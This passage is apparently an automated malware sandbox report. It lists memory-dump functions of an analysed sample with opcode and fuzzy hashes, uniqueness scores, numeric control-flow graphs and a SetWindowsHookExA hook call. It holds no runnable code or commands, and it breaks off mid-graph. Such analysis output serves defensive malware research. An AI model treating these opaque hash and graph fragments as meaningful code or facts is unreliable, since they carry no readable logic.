                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e78beedd4315e2dc2eb0b49de5daee4d90eb5040508314c6fc3b0d8fad52489c
                                                          • Instruction ID: c5c94e1b695787465f5ed45009b3c2371d9ee101eb140f567e049a78c02e0e42
                                                          • Opcode Fuzzy Hash: e78beedd4315e2dc2eb0b49de5daee4d90eb5040508314c6fc3b0d8fad52489c
                                                          • Instruction Fuzzy Hash: 204111B0D003499FCB14CF99D984ADEBFF5BF48314F608429E809AB254DB74A949CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CFDA0 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d9caf86717154d45c1300987d9d5588565694d9b1eb9862aa9fe8dadc1577669
                                                          • Instruction ID: ca53a802d8d43a9eb88845e486458e6c89073d6955c92ebab132d75843d05d17
                                                          • Opcode Fuzzy Hash: d9caf86717154d45c1300987d9d5588565694d9b1eb9862aa9fe8dadc1577669
                                                          • Instruction Fuzzy Hash: E8215E75E012169FDB10DFA9D880FED7BF1AB58710F114069E905EB355E730D946CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CFDB0 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e93071a7d6daf104d0a197010b979e4e948fef3ae809672e64d6966ba08a80ff
                                                          • Instruction ID: ed14a512c0a9e6372a8081ff6ead43c40c66f027b80f2c0cda040400e6f3d16b
                                                          • Opcode Fuzzy Hash: e93071a7d6daf104d0a197010b979e4e948fef3ae809672e64d6966ba08a80ff
                                                          • Instruction Fuzzy Hash: 8F212A75A0121A9FDB20DFA9D880FAEB7F2EB48710F118029E905E7365E731D816DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C7F10 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a1e11ea0d7bc81e09dd41f7bfb1e71ddf24dc0786f969bf59d0374ee8f43043
                                                          • Instruction ID: ef273025f1eb01aea50399e7786ae0908193ce8d72dc20bf24b43b2255f45861
                                                          • Opcode Fuzzy Hash: 7a1e11ea0d7bc81e09dd41f7bfb1e71ddf24dc0786f969bf59d0374ee8f43043
                                                          • Instruction Fuzzy Hash: 8D215171A0420A9BDB15CF64D490B9EF7B6FF99300F50C62DE815AB290DB70DC46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C7E01 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 209d0351534bb9edab015e17d31952115781da317e53db32690140006ff659ff
                                                          • Instruction ID: 3d5931bff7134d19e331b32338641022425367ece4120de6a3c136e258e45876
                                                          • Opcode Fuzzy Hash: 209d0351534bb9edab015e17d31952115781da317e53db32690140006ff659ff
                                                          • Instruction Fuzzy Hash: 8C21A731E042059BDB09CFA5D845BDEB7B2BF99300F20855AE815BB390EBB0DC46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C1529 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa0d138551122a03443e7c4d323763a3b3b3f7af23c05d2be0f1eebf72453505
                                                          • Instruction ID: d6f4f4858077a93119bffe9ce306b6a59bdc4d1aa8f84c8eb5721c7c2514509d
                                                          • Opcode Fuzzy Hash: fa0d138551122a03443e7c4d323763a3b3b3f7af23c05d2be0f1eebf72453505
                                                          • Instruction Fuzzy Hash: 0721F5746502416FDB52E728E884F6D3721EBA3310F900D69D006DB2BAFB74DC8A8B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C1381 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b20b01b2b1a42d0d4f9bf6c63606f3394825a78fa6edd9c2d43a821b51142a7a
                                                          • Instruction ID: ce0a7694b28627dc1ba5c1bb3bfda9290e79326e048694eef081666b70a071a3
                                                          • Opcode Fuzzy Hash: b20b01b2b1a42d0d4f9bf6c63606f3394825a78fa6edd9c2d43a821b51142a7a
                                                          • Instruction Fuzzy Hash: 6321A870644281AFDB365778D498B6D3B31EB67328F14086EE44AD7AA3D725CCCAC742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C7E10 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 467d661e83c9937ae69f5fff32fcc69753cf55525774fa377c183c003787a4f3
                                                          • Instruction ID: 5f6f3f5e702f5742797c252b46b6fb9b35d074093815a64d1a26c311239619a4
                                                          • Opcode Fuzzy Hash: 467d661e83c9937ae69f5fff32fcc69753cf55525774fa377c183c003787a4f3
                                                          • Instruction Fuzzy Hash: 0B215331E042059BCB09CFA5D450A9EB7B6BF99300F20855AE816B7390DBB0DC46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C1710 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94a30a1026a1d33392fb731534d6399881d5b6c0a2c1466ce25c449be7457dd0
                                                          • Instruction ID: 1c80db1c5c0c1853d4959576a37b84927baff9cf7fdf2fb14972db56fa9ae512
                                                          • Opcode Fuzzy Hash: 94a30a1026a1d33392fb731534d6399881d5b6c0a2c1466ce25c449be7457dd0
                                                          • Instruction Fuzzy Hash: 12212A34B40205DFDB55EB74C554BAE77F2AB9A344F20046CD406EB261DB35DD05CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C1538 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 49f60d32bb6363cb56c9fe338a08bc6ea7bd72d743a2037ddc2a879c879e2875
                                                          • Instruction ID: 018d53f63b9786c4a338b9abb34844c6e21b284ba239475d4ae57fda649ac9f8
                                                          • Opcode Fuzzy Hash: 49f60d32bb6363cb56c9fe338a08bc6ea7bd72d743a2037ddc2a879c879e2875
                                                          • Instruction Fuzzy Hash: 282127746502016FDB52FB28E844F6D3366EB93314F900D25D006D72BAFB74EC8A8B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C4E18 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21cad1217071f2d2c5854314f24b6c49971a1fde4f61fd971ef145f12bb3c30f
                                                          • Instruction ID: 5c73f458c3cec81f500203ea791c76c76f9f6c6decd78d008ce52f9957ae0b9f
                                                          • Opcode Fuzzy Hash: 21cad1217071f2d2c5854314f24b6c49971a1fde4f61fd971ef145f12bb3c30f
                                                          • Instruction Fuzzy Hash: 7B21C034A00218CFDB55EB68D968BAD77F2BB9C304B214468E406EB3A0DB35DD458BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C0838 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ff67ba2b0757ef80c769050a99f9f6e382f104518734f9eaeee331626c4fd738
                                                          • Instruction ID: c69469bf088d12495f5f27217e87939c431fe431017f7925c6ed4b049ad2bfa9
                                                          • Opcode Fuzzy Hash: ff67ba2b0757ef80c769050a99f9f6e382f104518734f9eaeee331626c4fd738
                                                          • Instruction Fuzzy Hash: AC11E730F04344DFEF2756749890BAD3B619BBA314F24892ED006DB281EB25CD868BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C0848 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de21bc0dd061ee6f9b4fa5e2346149c1305cc432feb53837d6b67b557ad0d0cc
                                                          • Instruction ID: 98edff8fb197c33d1845caaa24e18ec8f70636f9359172ed044845fefc95a372
                                                          • Opcode Fuzzy Hash: de21bc0dd061ee6f9b4fa5e2346149c1305cc432feb53837d6b67b557ad0d0cc
                                                          • Instruction Fuzzy Hash: FE118F30B00204CBEF569A79D840B6A3791AB6A314F20893DE006DB295EB31DC868BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C1648 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e713fc5473540bb8e1749b0d53b96c291c639f7c6bf71a4fb8b16fb9c690421d
                                                          • Instruction ID: cf9c94d2dd7e34ee9a703f733c212a6f9e1c4c307cccea352f8bddc038c4d4d7
                                                          • Opcode Fuzzy Hash: e713fc5473540bb8e1749b0d53b96c291c639f7c6bf71a4fb8b16fb9c690421d
                                                          • Instruction Fuzzy Hash: 7C112571F002119FCF11ABB49848BAE7BF1EB98250F140669E906D3351EB34C946CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CFEC0 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1aaa91a243ad80778788e23391cab6ca4fe84aebd7cd41ce5d52d86f2386cda9
                                                          • Instruction ID: 23e25fa35db7679d3a0b6a0cab50b8933dd4940d5aecc65016240838b85a4ea0
                                                          • Opcode Fuzzy Hash: 1aaa91a243ad80778788e23391cab6ca4fe84aebd7cd41ce5d52d86f2386cda9
                                                          • Instruction Fuzzy Hash: 84118E32B001294BCB68DA68D914AAE73FBEBC9351B11813ED406EB350EF35DC06CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CFB78 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 438ff7dc74421cf43c2b1c500ae7ea07705a831710e435d00aa94e6c91e317c0
                                                          • Instruction ID: 880ea3f42cc6d75267776da2a771cca874bd905dbf1cf31e5a6739f03d5e78ab
                                                          • Opcode Fuzzy Hash: 438ff7dc74421cf43c2b1c500ae7ea07705a831710e435d00aa94e6c91e317c0
                                                          • Instruction Fuzzy Hash: 8D21E2B5D002599FCB00CFAAD984BDEFFB4BB49310F10852AE918A7241D374A954CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C64DC Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b33534ad4a833c384809fffcef59a3f8bbfe5fafe712c5fa7b488156ed7fe6d
                                                          • Instruction ID: 0e12aa8b1f8f09f985a8f505cf76bc9778899fa3413bc02d6ec22e01390d25b0
                                                          • Opcode Fuzzy Hash: 7b33534ad4a833c384809fffcef59a3f8bbfe5fafe712c5fa7b488156ed7fe6d
                                                          • Instruction Fuzzy Hash: 9421C2B5D00219AFCB00CF9AD984BDEFFB5FB49350F50852AE918B7200D374A954CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CFEB0 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5696ba8cc473baf8b6895f97d2f8adabd249754f19ccac9793a47bd5df940f77
                                                          • Instruction ID: 7a282c0f6a689d5f7decd6dce8c428b56a31f3d395a4428b57565388459cb9d9
                                                          • Opcode Fuzzy Hash: 5696ba8cc473baf8b6895f97d2f8adabd249754f19ccac9793a47bd5df940f77
                                                          • Instruction Fuzzy Hash: 60019E32B111155FDB689AB89860BEF77EBDB99711F41413EC406D7290EB618C07C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C1498 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 838e8c508efdfca2312beed570474875adcac8657cc142a47f10f5993d6eb7d9
                                                          • Instruction ID: 4d38320eeca60358f7f1d053dfbcc5e8c98ad3693c11ca180968286d8a1cba51
                                                          • Opcode Fuzzy Hash: 838e8c508efdfca2312beed570474875adcac8657cc142a47f10f5993d6eb7d9
                                                          • Instruction Fuzzy Hash: CE016D31A00215DBCB26EFF89445AAE7BF6EF6A350B24047DD406E7302EB36D9418BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C3B7F Relevance: .0, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 831cbae5a6d8cddfac48f23ba96b5374f8fcde9406b7d9210b8576e9f23bd900
                                                          • Instruction ID: ef559005ee1c772eff9efff7c18145837da548204ae69e3872a77d4773c801c2
                                                          • Opcode Fuzzy Hash: 831cbae5a6d8cddfac48f23ba96b5374f8fcde9406b7d9210b8576e9f23bd900
                                                          • Instruction Fuzzy Hash: B0112D34D05349DECF34DA94D59ABECB772AF24319F14942ED021B6091DB348ECACB12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C6DB0 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.625731492.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_1c0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5be83869df01160b6a6d1a91558aee4064a3483970ef9028aa06dd64964ecdd
                                                          • Instruction ID: 8e1124d71fae73fd4aaede8afc299aef6a060da804f8544b4cef08ba84acc0e9
                                                          • Opcode Fuzzy Hash: b5be83869df01160b6a6d1a91558aee4064a3483970ef9028aa06dd64964ecdd
                                                          • Instruction Fuzzy Hash: C3F08170A1034DAFC745FFB4E442AAD77B1EF40300B904968C504A7258EB30BE0E9B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:11.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 16763 4b9ff8 16764 4ba03c SetWindowsHookExA 16763->16764 16766 4ba082 16764->16766

                                                          Executed Functions

                                                          Function 001CF360 Relevance: 10.5, Strings: 8, Instructions: 545COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 1cf360-1cf381 1 1cf383-1cf386 0->1 2 1cf38c-1cf3ab 1->2 3 1cfb27-1cfb2a 1->3 12 1cf3ad-1cf3b0 2->12 13 1cf3c4-1cf3ce 2->13 4 1cfb2c-1cfb4b 3->4 5 1cfb50-1cfb52 3->5 4->5 7 1cfb59-1cfb5c 5->7 8 1cfb54 5->8 7->1 10 1cfb62-1cfb6b 7->10 8->7 12->13 15 1cf3b2-1cf3c2 12->15 18 1cf3d4-1cf3ef call 1c64dc 13->18 15->18 21 1cf3fc-1cf6d9 18->21 22 1cf3f1-1cf3f7 18->22 43 1cf6df-1cf78e 21->43 44 1cfb19-1cfb26 21->44 22->10 53 1cf7b7 43->53 54 1cf790-1cf7b5 43->54 56 1cf7c0-1cf7c9 call 1c64e8 53->56 54->56 58 1cf7ce-1cf7d3 56->58 59 1cf7d9-1cf7fb call 1c64f4 58->59 60 1cfb00-1cfb0c 58->60 59->60 64 1cf801-1cf80b 59->64 60->43 61 1cfb12 60->61 61->44 64->60 65 1cf811-1cf81c 64->65 65->60 66 1cf822-1cf8f8 call 1c0174 * 2 65->66 80 1cf8fa-1cf8fc 66->80 81 1cf906-1cf936 call 1c0174 66->81 80->81 86 1cf938-1cf93a 81->86 87 1cf944-1cf950 81->87 86->87 88 1cf9b0-1cf9b4 87->88 89 1cf952-1cf956 87->89 90 1cf9ba-1cf9f6 call 1c0174 88->90 91 1cfaf1-1cfafa 88->91 89->88 92 1cf958-1cf982 call 1c0174 89->92 105 1cf9f8-1cf9fa 90->105 106 1cfa04-1cfa12 90->106 91->60 91->66 101 1cf984-1cf986 92->101 102 1cf990-1cf9ad call 1c6500 92->102 101->102 102->88 105->106 109 1cfa29-1cfa34 106->109 110 1cfa14-1cfa1f 106->110 114 1cfa4c-1cfa5d 109->114 115 1cfa36-1cfa3c 109->115 110->109 113 1cfa21 110->113 113->109 119 1cfa5f-1cfa65 114->119 120 1cfa75-1cfa81 114->120 116 1cfa3e 115->116 117 1cfa40-1cfa42 115->117 116->114 117->114 121 1cfa69-1cfa6b 119->121 122 1cfa67 119->122 124 1cfa99-1cfaea 120->124 125 1cfa83-1cfa89 120->125 121->120 122->120 124->91 126 1cfa8d-1cfa8f 125->126 127 1cfa8b 125->127 126->124 127->124
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0.L$$p$$p$$p$$p$$p$$p$.L
                                                          • API String ID: 0-1711779697
                                                          • Opcode ID: 7f74d1e4e99fbec056144970acbf2a6f50297f4b7adba9504f56c13872834e42
                                                          • Instruction ID: f213eafa5b43cc555ea6ab043e4fd71109ea575f579d4053e83c57172016d02f
                                                          • Opcode Fuzzy Hash: 7f74d1e4e99fbec056144970acbf2a6f50297f4b7adba9504f56c13872834e42
                                                          • Instruction Fuzzy Hash: E2322C31A1075A8BCB14EB65D854AADF7B2BFD9300F60C6AED409A7254EF70DD85CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CE54A Relevance: 4.8, Strings: 3, Instructions: 1039COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0,L$0,L$.L
                                                          • API String ID: 0-1188208038
                                                          • Opcode ID: 94b32f58b1eefa6ca8e3da12fa0511dfb8ca83230a0ea885024be7c9015c5b5a
                                                          • Instruction ID: 92fdf3a6ad7bb5876aa30bd033d0213c0b9013d19c80be4f0a49eb56f0a78397
                                                          • Opcode Fuzzy Hash: 94b32f58b1eefa6ca8e3da12fa0511dfb8ca83230a0ea885024be7c9015c5b5a
                                                          • Instruction Fuzzy Hash: E0A21334A002048FDB64DB68C588FADB7F2FB99314F5584A9D409AB362DB35ED86CF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C8C00 Relevance: 2.8, Instructions: 2810COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dc38836af53d24ef4dd18d26e2d6b07b8afb9ae0b71c86f37bdc342fe95f38b
                                                          • Instruction ID: 952dea24af49ccf54c0538a7b8ed1e717c49474b3c63c7c0b76eaee01f653a77
                                                          • Opcode Fuzzy Hash: 8dc38836af53d24ef4dd18d26e2d6b07b8afb9ae0b71c86f37bdc342fe95f38b
                                                          • Instruction Fuzzy Hash: AB530931C10B1A8ACB51EF68C884A99F7B1FF99300F15C79AE45977121EB70AAD5CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001CBE88 Relevance: 2.3, Instructions: 2307COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.625732464.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_1c0000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1479fcab7dfc38284c17849e14b09af508fa87a95fda98740e0759707df40f44
                                                          • Instruction ID: 63b8eeb6cedcdd7a53485e4a20a6e43bb963ff5635ca8bb6f7fc25227f2c11f7
                                                          • Opcode Fuzzy Hash: 1479fcab7dfc38284c17849e14b09af508fa87a95fda98740e0759707df40f44
                                                          • Instruction Fuzzy Hash: CD332E31D1071A8ACB15DF68C894AADF7B1FF99300F15C79AE449A7211EB70EAC5CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001C4518 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3281 1c4518-1c457e 3283 1c45c8-1c45ca 3281->3283 3284 1c4580-1c458b 3281->3284 3285 1c45cc-1c45e5 3283->3285 3284->3283 3286 1c458d-1c4599 3284->3286 3292 1c45e7-1c45f3 3285->3292 3293 1c4631-1c4633 3285->3293 3287 1c45bc-1c45c6 3286->3287 3288 1c459b-1c45a5 3286->3288 3287->3285 3290 1c45a9-1c45b8 3288->3290 3291 1c45a7 3288->3291 3290->3290 3294 1c45ba 3290->3294 3291->3290 3292->3293 3295 1c45f5-1c4601 3292->3295 3296 1c4635-1c464d 3293->3296 3294->3287 3297 1c4624-1c462f 3295->3297 3298 1c4603-1c460d 3295->3298 3303 1c464f-1c465a 3296->3303 3304 1c4697-1c4699 3296->3304 3297->3296 3299 1c460f 3298->3299 3300 1c4611-1c4620 3298->3300 3299->3300 3300->3300 3302 1c4622 3300->3302 3302->3297 3303->3304 3305 1c465c-1c4668 3303->3305 3306 1c469b-1c46b3 3304->3306 3307 1c466a-1c4674 3305->3307 3308 1c468b-1c4695 3305->3308 3313 1c46fd-1c46ff 3306->3313 3314 1c46b5-1c46c0 3306->3314 3309 1c4678-1c4687 3307->3309 3310 1c4676 3307->3310 3308->3306 3309->3309 3312 1c4689 3309->3312 3310->3309 3312->3308 3315 1c4701-1c4774 3313->3315 3314->3313 3316 1c46c2-1c46ce 3314->3316 3325 1c477a-1c4788 3315->3325 3317 1c46d0-1c46da 3316->3317 3318 1c46f1-1c46fb 3316->3318 3320 1c46dc 3317->3320 3321 1c46de-1c46ed 3317->3321 3318->3315 3320->3321 3321->3321 3322 1c46ef 3321->3322 3322->3318 3326 1c478a-1c4790 3325->3326 3327 1c4791-1c47f1 3325->3327 3326->3327 3334 1c4801-1c4805 3327->3334 3335 1c47f3-1c47f7 3327->3335 3337 1c4815-1c4819 3334->3337 3338 1c4807-1c480b 3334->3338 3335->3334 3336 1c47f9 3335->3336 3336->3334 3339 1c4829-1c482d 3337->3339 3340 1c481b-1c481f 3337->3340 3338->3337 3341 1c480d 3338->3341 3343 1c483d-1c4841 3339->3343 3344 